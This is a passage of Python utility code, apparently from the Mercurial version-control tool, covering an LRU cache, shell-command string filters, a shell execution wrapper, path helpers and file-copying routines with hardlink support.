632
633 If no transaction was provided, this simply runs the body and returns
633 If no transaction was provided, this simply runs the body and returns
634 """
634 """
635 if not tr:
635 if not tr:
636 yield
636 yield
637 return
637 return
638 try:
638 try:
639 yield
639 yield
640 tr.close()
640 tr.close()
641 except error.InterventionRequired:
641 except error.InterventionRequired:
642 tr.close()
642 tr.close()
643 raise
643 raise
644 finally:
644 finally:
645 tr.release()
645 tr.release()
646
646
647 @contextlib.contextmanager
647 @contextlib.contextmanager
648 def nullcontextmanager():
648 def nullcontextmanager():
649 yield
649 yield
650
650
651 class _lrucachenode(object):
651 class _lrucachenode(object):
652 """A node in a doubly linked list.
652 """A node in a doubly linked list.
653
653
654 Holds a reference to nodes on either side as well as a key-value
654 Holds a reference to nodes on either side as well as a key-value
655 pair for the dictionary entry.
655 pair for the dictionary entry.
656 """
656 """
657 __slots__ = (u'next', u'prev', u'key', u'value')
657 __slots__ = (u'next', u'prev', u'key', u'value')
658
658
659 def __init__(self):
659 def __init__(self):
660 self.next = None
660 self.next = None
661 self.prev = None
661 self.prev = None
662
662
663 self.key = _notset
663 self.key = _notset
664 self.value = None
664 self.value = None
665
665
666 def markempty(self):
666 def markempty(self):
667 """Mark the node as emptied."""
667 """Mark the node as emptied."""
668 self.key = _notset
668 self.key = _notset
669
669
670 class lrucachedict(object):
670 class lrucachedict(object):
671 """Dict that caches most recent accesses and sets.
671 """Dict that caches most recent accesses and sets.
672
672
673 The dict consists of an actual backing dict - indexed by original
673 The dict consists of an actual backing dict - indexed by original
674 key - and a doubly linked circular list defining the order of entries in
674 key - and a doubly linked circular list defining the order of entries in
675 the cache.
675 the cache.
676
676
677 The head node is the newest entry in the cache. If the cache is full,
677 The head node is the newest entry in the cache. If the cache is full,
678 we recycle head.prev and make it the new head. Cache accesses result in
678 we recycle head.prev and make it the new head. Cache accesses result in
679 the node being moved to before the existing head and being marked as the
679 the node being moved to before the existing head and being marked as the
680 new head node.
680 new head node.
681 """
681 """
682 def __init__(self, max):
682 def __init__(self, max):
683 self._cache = {}
683 self._cache = {}
684
684
685 self._head = head = _lrucachenode()
685 self._head = head = _lrucachenode()
686 head.prev = head
686 head.prev = head
687 head.next = head
687 head.next = head
688 self._size = 1
688 self._size = 1
689 self._capacity = max
689 self._capacity = max
690
690
691 def __len__(self):
691 def __len__(self):
692 return len(self._cache)
692 return len(self._cache)
693
693
694 def __contains__(self, k):
694 def __contains__(self, k):
695 return k in self._cache
695 return k in self._cache
696
696
697 def __iter__(self):
697 def __iter__(self):
698 # We don't have to iterate in cache order, but why not.
698 # We don't have to iterate in cache order, but why not.
699 n = self._head
699 n = self._head
700 for i in range(len(self._cache)):
700 for i in range(len(self._cache)):
701 yield n.key
701 yield n.key
702 n = n.next
702 n = n.next
703
703
704 def __getitem__(self, k):
704 def __getitem__(self, k):
705 node = self._cache[k]
705 node = self._cache[k]
706 self._movetohead(node)
706 self._movetohead(node)
707 return node.value
707 return node.value
708
708
709 def __setitem__(self, k, v):
709 def __setitem__(self, k, v):
710 node = self._cache.get(k)
710 node = self._cache.get(k)
711 # Replace existing value and mark as newest.
711 # Replace existing value and mark as newest.
712 if node is not None:
712 if node is not None:
713 node.value = v
713 node.value = v
714 self._movetohead(node)
714 self._movetohead(node)
715 return
715 return
716
716
717 if self._size < self._capacity:
717 if self._size < self._capacity:
718 node = self._addcapacity()
718 node = self._addcapacity()
719 else:
719 else:
720 # Grab the last/oldest item.
720 # Grab the last/oldest item.
721 node = self._head.prev
721 node = self._head.prev
722
722
723 # At capacity. Kill the old entry.
723 # At capacity. Kill the old entry.
724 if node.key is not _notset:
724 if node.key is not _notset:
725 del self._cache[node.key]
725 del self._cache[node.key]
726
726
727 node.key = k
727 node.key = k
728 node.value = v
728 node.value = v
729 self._cache[k] = node
729 self._cache[k] = node
730 # And mark it as newest entry. No need to adjust order since it
730 # And mark it as newest entry. No need to adjust order since it
731 # is already self._head.prev.
731 # is already self._head.prev.
732 self._head = node
732 self._head = node
733
733
734 def __delitem__(self, k):
734 def __delitem__(self, k):
735 node = self._cache.pop(k)
735 node = self._cache.pop(k)
736 node.markempty()
736 node.markempty()
737
737
738 # Temporarily mark as newest item before re-adjusting head to make
738 # Temporarily mark as newest item before re-adjusting head to make
739 # this node the oldest item.
739 # this node the oldest item.
740 self._movetohead(node)
740 self._movetohead(node)
741 self._head = node.next
741 self._head = node.next
742
742
743 # Additional dict methods.
743 # Additional dict methods.
744
744
745 def get(self, k, default=None):
745 def get(self, k, default=None):
746 try:
746 try:
747 return self._cache[k].value
747 return self._cache[k].value
748 except KeyError:
748 except KeyError:
749 return default
749 return default
750
750
751 def clear(self):
751 def clear(self):
752 n = self._head
752 n = self._head
753 while n.key is not _notset:
753 while n.key is not _notset:
754 n.markempty()
754 n.markempty()
755 n = n.next
755 n = n.next
756
756
757 self._cache.clear()
757 self._cache.clear()
758
758
759 def copy(self):
759 def copy(self):
760 result = lrucachedict(self._capacity)
760 result = lrucachedict(self._capacity)
761 n = self._head.prev
761 n = self._head.prev
762 # Iterate in oldest-to-newest order, so the copy has the right ordering
762 # Iterate in oldest-to-newest order, so the copy has the right ordering
763 for i in range(len(self._cache)):
763 for i in range(len(self._cache)):
764 result[n.key] = n.value
764 result[n.key] = n.value
765 n = n.prev
765 n = n.prev
766 return result
766 return result
767
767
768 def _movetohead(self, node):
768 def _movetohead(self, node):
769 """Mark a node as the newest, making it the new head.
769 """Mark a node as the newest, making it the new head.
770
770
771 When a node is accessed, it becomes the freshest entry in the LRU
771 When a node is accessed, it becomes the freshest entry in the LRU
772 list, which is denoted by self._head.
772 list, which is denoted by self._head.
773
773
774 Visually, let's make ``N`` the new head node (* denotes head):
774 Visually, let's make ``N`` the new head node (* denotes head):
775
775
776 previous/oldest <-> head <-> next/next newest
776 previous/oldest <-> head <-> next/next newest
777
777
778 ----<->--- A* ---<->-----
778 ----<->--- A* ---<->-----
779 | |
779 | |
780 E <-> D <-> N <-> C <-> B
780 E <-> D <-> N <-> C <-> B
781
781
782 To:
782 To:
783
783
784 ----<->--- N* ---<->-----
784 ----<->--- N* ---<->-----
785 | |
785 | |
786 E <-> D <-> C <-> B <-> A
786 E <-> D <-> C <-> B <-> A
787
787
788 This requires the following moves:
788 This requires the following moves:
789
789
790 C.next = D (node.prev.next = node.next)
790 C.next = D (node.prev.next = node.next)
791 D.prev = C (node.next.prev = node.prev)
791 D.prev = C (node.next.prev = node.prev)
792 E.next = N (head.prev.next = node)
792 E.next = N (head.prev.next = node)
793 N.prev = E (node.prev = head.prev)
793 N.prev = E (node.prev = head.prev)
794 N.next = A (node.next = head)
794 N.next = A (node.next = head)
795 A.prev = N (head.prev = node)
795 A.prev = N (head.prev = node)
796 """
796 """
797 head = self._head
797 head = self._head
798 # C.next = D
798 # C.next = D
799 node.prev.next = node.next
799 node.prev.next = node.next
800 # D.prev = C
800 # D.prev = C
801 node.next.prev = node.prev
801 node.next.prev = node.prev
802 # N.prev = E
802 # N.prev = E
803 node.prev = head.prev
803 node.prev = head.prev
804 # N.next = A
804 # N.next = A
805 # It is tempting to do just "head" here, however if node is
805 # It is tempting to do just "head" here, however if node is
806 # adjacent to head, this will do bad things.
806 # adjacent to head, this will do bad things.
807 node.next = head.prev.next
807 node.next = head.prev.next
808 # E.next = N
808 # E.next = N
809 node.next.prev = node
809 node.next.prev = node
810 # A.prev = N
810 # A.prev = N
811 node.prev.next = node
811 node.prev.next = node
812
812
813 self._head = node
813 self._head = node
814
814
815 def _addcapacity(self):
815 def _addcapacity(self):
816 """Add a node to the circular linked list.
816 """Add a node to the circular linked list.
817
817
818 The new node is inserted before the head node.
818 The new node is inserted before the head node.
819 """
819 """
820 head = self._head
820 head = self._head
821 node = _lrucachenode()
821 node = _lrucachenode()
822 head.prev.next = node
822 head.prev.next = node
823 node.prev = head.prev
823 node.prev = head.prev
824 node.next = head
824 node.next = head
825 head.prev = node
825 head.prev = node
826 self._size += 1
826 self._size += 1
827 return node
827 return node
828
828
829 def lrucachefunc(func):
829 def lrucachefunc(func):
830 '''cache most recent results of function calls'''
830 '''cache most recent results of function calls'''
831 cache = {}
831 cache = {}
832 order = collections.deque()
832 order = collections.deque()
833 if func.__code__.co_argcount == 1:
833 if func.__code__.co_argcount == 1:
834 def f(arg):
834 def f(arg):
835 if arg not in cache:
835 if arg not in cache:
836 if len(cache) > 20:
836 if len(cache) > 20:
837 del cache[order.popleft()]
837 del cache[order.popleft()]
838 cache[arg] = func(arg)
838 cache[arg] = func(arg)
839 else:
839 else:
840 order.remove(arg)
840 order.remove(arg)
841 order.append(arg)
841 order.append(arg)
842 return cache[arg]
842 return cache[arg]
843 else:
843 else:
844 def f(*args):
844 def f(*args):
845 if args not in cache:
845 if args not in cache:
846 if len(cache) > 20:
846 if len(cache) > 20:
847 del cache[order.popleft()]
847 del cache[order.popleft()]
848 cache[args] = func(*args)
848 cache[args] = func(*args)
849 else:
849 else:
850 order.remove(args)
850 order.remove(args)
851 order.append(args)
851 order.append(args)
852 return cache[args]
852 return cache[args]
853
853
854 return f
854 return f
855
855
856 class propertycache(object):
856 class propertycache(object):
857 def __init__(self, func):
857 def __init__(self, func):
858 self.func = func
858 self.func = func
859 self.name = func.__name__
859 self.name = func.__name__
860 def __get__(self, obj, type=None):
860 def __get__(self, obj, type=None):
861 result = self.func(obj)
861 result = self.func(obj)
862 self.cachevalue(obj, result)
862 self.cachevalue(obj, result)
863 return result
863 return result
864
864
865 def cachevalue(self, obj, value):
865 def cachevalue(self, obj, value):
866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
866 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
867 obj.__dict__[self.name] = value
867 obj.__dict__[self.name] = value
868
868
869 def pipefilter(s, cmd):
869 def pipefilter(s, cmd):
870 '''filter string S through command CMD, returning its output'''
870 '''filter string S through command CMD, returning its output'''
871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
871 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
872 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
873 pout, perr = p.communicate(s)
873 pout, perr = p.communicate(s)
874 return pout
874 return pout
875
875
876 def tempfilter(s, cmd):
876 def tempfilter(s, cmd):
877 '''filter string S through a pair of temporary files with CMD.
877 '''filter string S through a pair of temporary files with CMD.
878 CMD is used as a template to create the real command to be run,
878 CMD is used as a template to create the real command to be run,
879 with the strings INFILE and OUTFILE replaced by the real names of
879 with the strings INFILE and OUTFILE replaced by the real names of
880 the temporary files generated.'''
880 the temporary files generated.'''
881 inname, outname = None, None
881 inname, outname = None, None
882 try:
882 try:
883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
883 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
884 fp = os.fdopen(infd, pycompat.sysstr('wb'))
885 fp.write(s)
885 fp.write(s)
886 fp.close()
886 fp.close()
887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
887 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
888 os.close(outfd)
888 os.close(outfd)
889 cmd = cmd.replace('INFILE', inname)
889 cmd = cmd.replace('INFILE', inname)
890 cmd = cmd.replace('OUTFILE', outname)
890 cmd = cmd.replace('OUTFILE', outname)
891 code = os.system(cmd)
891 code = os.system(cmd)
892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
892 if pycompat.sysplatform == 'OpenVMS' and code & 1:
893 code = 0
893 code = 0
894 if code:
894 if code:
895 raise Abort(_("command '%s' failed: %s") %
895 raise Abort(_("command '%s' failed: %s") %
896 (cmd, explainexit(code)))
896 (cmd, explainexit(code)))
897 return readfile(outname)
897 return readfile(outname)
898 finally:
898 finally:
899 try:
899 try:
900 if inname:
900 if inname:
901 os.unlink(inname)
901 os.unlink(inname)
902 except OSError:
902 except OSError:
903 pass
903 pass
904 try:
904 try:
905 if outname:
905 if outname:
906 os.unlink(outname)
906 os.unlink(outname)
907 except OSError:
907 except OSError:
908 pass
908 pass
909
909
910 filtertable = {
910 filtertable = {
911 'tempfile:': tempfilter,
911 'tempfile:': tempfilter,
912 'pipe:': pipefilter,
912 'pipe:': pipefilter,
913 }
913 }
914
914
915 def filter(s, cmd):
915 def filter(s, cmd):
916 "filter a string through a command that transforms its input to its output"
916 "filter a string through a command that transforms its input to its output"
917 for name, fn in filtertable.iteritems():
917 for name, fn in filtertable.iteritems():
918 if cmd.startswith(name):
918 if cmd.startswith(name):
919 return fn(s, cmd[len(name):].lstrip())
919 return fn(s, cmd[len(name):].lstrip())
920 return pipefilter(s, cmd)
920 return pipefilter(s, cmd)
921
921
922 def binary(s):
922 def binary(s):
923 """return true if a string is binary data"""
923 """return true if a string is binary data"""
924 return bool(s and '\0' in s)
924 return bool(s and '\0' in s)
925
925
926 def increasingchunks(source, min=1024, max=65536):
926 def increasingchunks(source, min=1024, max=65536):
927 '''return no less than min bytes per chunk while data remains,
927 '''return no less than min bytes per chunk while data remains,
928 doubling min after each chunk until it reaches max'''
928 doubling min after each chunk until it reaches max'''
929 def log2(x):
929 def log2(x):
930 if not x:
930 if not x:
931 return 0
931 return 0
932 i = 0
932 i = 0
933 while x:
933 while x:
934 x >>= 1
934 x >>= 1
935 i += 1
935 i += 1
936 return i - 1
936 return i - 1
937
937
938 buf = []
938 buf = []
939 blen = 0
939 blen = 0
940 for chunk in source:
940 for chunk in source:
941 buf.append(chunk)
941 buf.append(chunk)
942 blen += len(chunk)
942 blen += len(chunk)
943 if blen >= min:
943 if blen >= min:
944 if min < max:
944 if min < max:
945 min = min << 1
945 min = min << 1
946 nmin = 1 << log2(blen)
946 nmin = 1 << log2(blen)
947 if nmin > min:
947 if nmin > min:
948 min = nmin
948 min = nmin
949 if min > max:
949 if min > max:
950 min = max
950 min = max
951 yield ''.join(buf)
951 yield ''.join(buf)
952 blen = 0
952 blen = 0
953 buf = []
953 buf = []
954 if buf:
954 if buf:
955 yield ''.join(buf)
955 yield ''.join(buf)
956
956
957 Abort = error.Abort
957 Abort = error.Abort
958
958
959 def always(fn):
959 def always(fn):
960 return True
960 return True
961
961
962 def never(fn):
962 def never(fn):
963 return False
963 return False
964
964
965 def nogc(func):
965 def nogc(func):
966 """disable garbage collector
966 """disable garbage collector
967
967
968 Python's garbage collector triggers a GC each time a certain number of
968 Python's garbage collector triggers a GC each time a certain number of
969 container objects (the number being defined by gc.get_threshold()) are
969 container objects (the number being defined by gc.get_threshold()) are
970 allocated even when marked not to be tracked by the collector. Tracking has
970 allocated even when marked not to be tracked by the collector. Tracking has
971 no effect on when GCs are triggered, only on what objects the GC looks
971 no effect on when GCs are triggered, only on what objects the GC looks
972 into. As a workaround, disable GC while building complex (huge)
972 into. As a workaround, disable GC while building complex (huge)
973 containers.
973 containers.
974
974
975 This garbage collector issue have been fixed in 2.7. But it still affect
975 This garbage collector issue have been fixed in 2.7. But it still affect
976 CPython's performance.
976 CPython's performance.
977 """
977 """
978 def wrapper(*args, **kwargs):
978 def wrapper(*args, **kwargs):
979 gcenabled = gc.isenabled()
979 gcenabled = gc.isenabled()
980 gc.disable()
980 gc.disable()
981 try:
981 try:
982 return func(*args, **kwargs)
982 return func(*args, **kwargs)
983 finally:
983 finally:
984 if gcenabled:
984 if gcenabled:
985 gc.enable()
985 gc.enable()
986 return wrapper
986 return wrapper
987
987
988 if pycompat.ispypy:
988 if pycompat.ispypy:
989 # PyPy runs slower with gc disabled
989 # PyPy runs slower with gc disabled
990 nogc = lambda x: x
990 nogc = lambda x: x
991
991
992 def pathto(root, n1, n2):
992 def pathto(root, n1, n2):
993 '''return the relative path from one place to another.
993 '''return the relative path from one place to another.
994 root should use os.sep to separate directories
994 root should use os.sep to separate directories
995 n1 should use os.sep to separate directories
995 n1 should use os.sep to separate directories
996 n2 should use "/" to separate directories
996 n2 should use "/" to separate directories
997 returns an os.sep-separated path.
997 returns an os.sep-separated path.
998
998
999 If n1 is a relative path, it's assumed it's
999 If n1 is a relative path, it's assumed it's
1000 relative to root.
1000 relative to root.
1001 n2 should always be relative to root.
1001 n2 should always be relative to root.
1002 '''
1002 '''
1003 if not n1:
1003 if not n1:
1004 return localpath(n2)
1004 return localpath(n2)
1005 if os.path.isabs(n1):
1005 if os.path.isabs(n1):
1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1006 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1007 return os.path.join(root, localpath(n2))
1007 return os.path.join(root, localpath(n2))
1008 n2 = '/'.join((pconvert(root), n2))
1008 n2 = '/'.join((pconvert(root), n2))
1009 a, b = splitpath(n1), n2.split('/')
1009 a, b = splitpath(n1), n2.split('/')
1010 a.reverse()
1010 a.reverse()
1011 b.reverse()
1011 b.reverse()
1012 while a and b and a[-1] == b[-1]:
1012 while a and b and a[-1] == b[-1]:
1013 a.pop()
1013 a.pop()
1014 b.pop()
1014 b.pop()
1015 b.reverse()
1015 b.reverse()
1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1016 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017
1017
1018 def mainfrozen():
1018 def mainfrozen():
1019 """return True if we are a frozen executable.
1019 """return True if we are a frozen executable.
1020
1020
1021 The code supports py2exe (most common, Windows only) and tools/freeze
1021 The code supports py2exe (most common, Windows only) and tools/freeze
1022 (portable, not much used).
1022 (portable, not much used).
1023 """
1023 """
1024 return (safehasattr(sys, "frozen") or # new py2exe
1024 return (safehasattr(sys, "frozen") or # new py2exe
1025 safehasattr(sys, "importers") or # old py2exe
1025 safehasattr(sys, "importers") or # old py2exe
1026 imp.is_frozen(u"__main__")) # tools/freeze
1026 imp.is_frozen(u"__main__")) # tools/freeze
1027
1027
1028 # the location of data files matching the source code
1028 # the location of data files matching the source code
1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1029 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1030 # executable version (py2exe) doesn't support __file__
1030 # executable version (py2exe) doesn't support __file__
1031 datapath = os.path.dirname(pycompat.sysexecutable)
1031 datapath = os.path.dirname(pycompat.sysexecutable)
1032 else:
1032 else:
1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1033 datapath = os.path.dirname(pycompat.fsencode(__file__))
1034
1034
1035 i18n.setdatapath(datapath)
1035 i18n.setdatapath(datapath)
1036
1036
1037 _hgexecutable = None
1037 _hgexecutable = None
1038
1038
1039 def hgexecutable():
1039 def hgexecutable():
1040 """return location of the 'hg' executable.
1040 """return location of the 'hg' executable.
1041
1041
1042 Defaults to $HG or 'hg' in the search path.
1042 Defaults to $HG or 'hg' in the search path.
1043 """
1043 """
1044 if _hgexecutable is None:
1044 if _hgexecutable is None:
1045 hg = encoding.environ.get('HG')
1045 hg = encoding.environ.get('HG')
1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1046 mainmod = sys.modules[pycompat.sysstr('__main__')]
1047 if hg:
1047 if hg:
1048 _sethgexecutable(hg)
1048 _sethgexecutable(hg)
1049 elif mainfrozen():
1049 elif mainfrozen():
1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1050 if getattr(sys, 'frozen', None) == 'macosx_app':
1051 # Env variable set by py2app
1051 # Env variable set by py2app
1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1052 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1053 else:
1053 else:
1054 _sethgexecutable(pycompat.sysexecutable)
1054 _sethgexecutable(pycompat.sysexecutable)
1055 elif (os.path.basename(
1055 elif (os.path.basename(
1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1056 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1057 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1058 else:
1058 else:
1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1059 exe = findexe('hg') or os.path.basename(sys.argv[0])
1060 _sethgexecutable(exe)
1060 _sethgexecutable(exe)
1061 return _hgexecutable
1061 return _hgexecutable
1062
1062
1063 def _sethgexecutable(path):
1063 def _sethgexecutable(path):
1064 """set location of the 'hg' executable"""
1064 """set location of the 'hg' executable"""
1065 global _hgexecutable
1065 global _hgexecutable
1066 _hgexecutable = path
1066 _hgexecutable = path
1067
1067
1068 def _isstdout(f):
1068 def _isstdout(f):
1069 fileno = getattr(f, 'fileno', None)
1069 fileno = getattr(f, 'fileno', None)
1070 return fileno and fileno() == sys.__stdout__.fileno()
1070 return fileno and fileno() == sys.__stdout__.fileno()
1071
1071
1072 def shellenviron(environ=None):
1072 def shellenviron(environ=None):
1073 """return environ with optional override, useful for shelling out"""
1073 """return environ with optional override, useful for shelling out"""
1074 def py2shell(val):
1074 def py2shell(val):
1075 'convert python object into string that is useful to shell'
1075 'convert python object into string that is useful to shell'
1076 if val is None or val is False:
1076 if val is None or val is False:
1077 return '0'
1077 return '0'
1078 if val is True:
1078 if val is True:
1079 return '1'
1079 return '1'
1080 return str(val)
1080 return str(val)
1081 env = dict(encoding.environ)
1081 env = dict(encoding.environ)
1082 if environ:
1082 if environ:
1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1083 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1084 env['HG'] = hgexecutable()
1084 env['HG'] = hgexecutable()
1085 return env
1085 return env
1086
1086
1087 def system(cmd, environ=None, cwd=None, out=None):
1087 def system(cmd, environ=None, cwd=None, out=None):
1088 '''enhanced shell command execution.
1088 '''enhanced shell command execution.
1089 run with environment maybe modified, maybe in different dir.
1089 run with environment maybe modified, maybe in different dir.
1090
1090
1091 if out is specified, it is assumed to be a file-like object that has a
1091 if out is specified, it is assumed to be a file-like object that has a
1092 write() method. stdout and stderr will be redirected to out.'''
1092 write() method. stdout and stderr will be redirected to out.'''
1093 try:
1093 try:
1094 stdout.flush()
1094 stdout.flush()
1095 except Exception:
1095 except Exception:
1096 pass
1096 pass
1097 cmd = quotecommand(cmd)
1097 cmd = quotecommand(cmd)
1098 env = shellenviron(environ)
1098 env = shellenviron(environ)
1099 if out is None or _isstdout(out):
1099 if out is None or _isstdout(out):
1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1100 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1101 env=env, cwd=cwd)
1101 env=env, cwd=cwd)
1102 else:
1102 else:
1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1103 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1104 env=env, cwd=cwd, stdout=subprocess.PIPE,
1105 stderr=subprocess.STDOUT)
1105 stderr=subprocess.STDOUT)
1106 for line in iter(proc.stdout.readline, ''):
1106 for line in iter(proc.stdout.readline, ''):
1107 out.write(line)
1107 out.write(line)
1108 proc.wait()
1108 proc.wait()
1109 rc = proc.returncode
1109 rc = proc.returncode
1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1110 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1111 rc = 0
1111 rc = 0
1112 return rc
1112 return rc
1113
1113
1114 def checksignature(func):
1114 def checksignature(func):
1115 '''wrap a function with code to check for calling errors'''
1115 '''wrap a function with code to check for calling errors'''
1116 def check(*args, **kwargs):
1116 def check(*args, **kwargs):
1117 try:
1117 try:
1118 return func(*args, **kwargs)
1118 return func(*args, **kwargs)
1119 except TypeError:
1119 except TypeError:
1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1120 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1121 raise error.SignatureError
1121 raise error.SignatureError
1122 raise
1122 raise
1123
1123
1124 return check
1124 return check
1125
1125
1126 # a whilelist of known filesystems where hardlink works reliably
1126 # a whilelist of known filesystems where hardlink works reliably
1127 _hardlinkfswhitelist = {
1127 _hardlinkfswhitelist = {
1128 'btrfs',
1128 'btrfs',
1129 'ext2',
1129 'ext2',
1130 'ext3',
1130 'ext3',
1131 'ext4',
1131 'ext4',
1132 'hfs',
1132 'hfs',
1133 'jfs',
1133 'jfs',
1134 'reiserfs',
1134 'reiserfs',
1135 'tmpfs',
1135 'tmpfs',
1136 'ufs',
1136 'ufs',
1137 'xfs',
1137 'xfs',
1138 'zfs',
1138 'zfs',
1139 }
1139 }
1140
1140
1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 '''copy a file, preserving mode and optionally other stat info like
1142 '''copy a file, preserving mode and optionally other stat info like
1143 atime/mtime
1143 atime/mtime
1144
1144
1145 checkambig argument is used with filestat, and is useful only if
1145 checkambig argument is used with filestat, and is useful only if
1146 destination file is guarded by any lock (e.g. repo.lock or
1146 destination file is guarded by any lock (e.g. repo.lock or
1147 repo.wlock).
1147 repo.wlock).
1148
1148
1149 copystat and checkambig should be exclusive.
1149 copystat and checkambig should be exclusive.
1150 '''
1150 '''
1151 assert not (copystat and checkambig)
1151 assert not (copystat and checkambig)
1152 oldstat = None
1152 oldstat = None
1153 if os.path.lexists(dest):
1153 if os.path.lexists(dest):
1154 if checkambig:
1154 if checkambig:
1155 oldstat = checkambig and filestat.frompath(dest)
1155 oldstat = checkambig and filestat.frompath(dest)
1156 unlink(dest)
1156 unlink(dest)
1157 if hardlink:
1157 if hardlink:
1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 # unless we are confident that dest is on a whitelisted filesystem.
1159 # unless we are confident that dest is on a whitelisted filesystem.
1160 try:
1160 try:
1161 fstype = getfstype(os.path.dirname(dest))
1161 fstype = getfstype(os.path.dirname(dest))
1162 except OSError:
1162 except OSError:
1163 fstype = None
1163 fstype = None
1164 if fstype not in _hardlinkfswhitelist:
1164 if fstype not in _hardlinkfswhitelist:
1165 hardlink = False
1165 hardlink = False
1166 if hardlink:
1166 if hardlink:
1167 try:
1167 try:
1168 oslink(src, dest)
1168 oslink(src, dest)
1169 return
1169 return
1170 except (IOError, OSError):
1170 except (IOError, OSError):
1171 pass # fall back to normal copy
1171 pass # fall back to normal copy
1172 if os.path.islink(src):
1172 if os.path.islink(src):
1173 os.symlink(os.readlink(src), dest)
1173 os.symlink(os.readlink(src), dest)
1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 # for them anyway
1175 # for them anyway
1176 else:
1176 else:
1177 try:
1177 try:
1178 shutil.copyfile(src, dest)
1178 shutil.copyfile(src, dest)
1179 if copystat:
1179 if copystat:
1180 # copystat also copies mode
1180 # copystat also copies mode
1181 shutil.copystat(src, dest)
1181 shutil.copystat(src, dest)
1182 else:
1182 else:
1183 shutil.copymode(src, dest)
1183 shutil.copymode(src, dest)
1184 if oldstat and oldstat.stat:
1184 if oldstat and oldstat.stat:
1185 newstat = filestat.frompath(dest)
1185 newstat = filestat.frompath(dest)
1186 if newstat.isambig(oldstat):
1186 if newstat.isambig(oldstat):
1187 # stat of copied file is ambiguous to original one
1187 # stat of copied file is ambiguous to original one
1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 os.utime(dest, (advanced, advanced))
1189 os.utime(dest, (advanced, advanced))
1190 except shutil.Error as inst:
1190 except shutil.Error as inst:
1191 raise Abort(str(inst))
1191 raise Abort(str(inst))
1192
1192
1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 """Copy a directory tree using hardlinks if possible."""
1194 """Copy a directory tree using hardlinks if possible."""
1195 num = 0
1195 num = 0
1196
1196
1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1198
1198
1199 if os.path.isdir(src):
1199 if os.path.isdir(src):
1200 if hardlink is None:
1200 if hardlink is None:
1201 hardlink = (os.stat(src).st_dev ==
1201 hardlink = (os.stat(src).st_dev ==
1202 os.stat(os.path.dirname(dst)).st_dev)
1202 os.stat(os.path.dirname(dst)).st_dev)
1203 topic = gettopic()
1203 topic = gettopic()
1204 os.mkdir(dst)
1204 os.mkdir(dst)
1205 for name, kind in listdir(src):
1205 for name, kind in listdir(src):
1206 srcname = os.path.join(src, name)
1206 srcname = os.path.join(src, name)
1207 dstname = os.path.join(dst, name)
1207 dstname = os.path.join(dst, name)
1208 def nprog(t, pos):
1208 def nprog(t, pos):
1209 if pos is not None:
1209 if pos is not None:
1210 return progress(t, pos + num)
1210 return progress(t, pos + num)
1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 num += n
1212 num += n
1213 else:
1213 else:
1214 if hardlink is None:
1214 if hardlink is None:
1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 os.stat(os.path.dirname(dst)).st_dev)
1216 os.stat(os.path.dirname(dst)).st_dev)
1217 topic = gettopic()
1217 topic = gettopic()
1218
1218
1219 if hardlink:
1219 if hardlink:
1220 try:
1220 try:
1221 oslink(src, dst)
1221 oslink(src, dst)
1222 except (IOError, OSError):
1222 except (IOError, OSError):
1223 hardlink = False
1223 hardlink = False
1224 shutil.copy(src, dst)
1224 shutil.copy(src, dst)
1225 else:
1225 else:
1226 shutil.copy(src, dst)
1226 shutil.copy(src, dst)
1227 num += 1
1227 num += 1
1228 progress(topic, num)
1228 progress(topic, num)
1229 progress(topic, None)
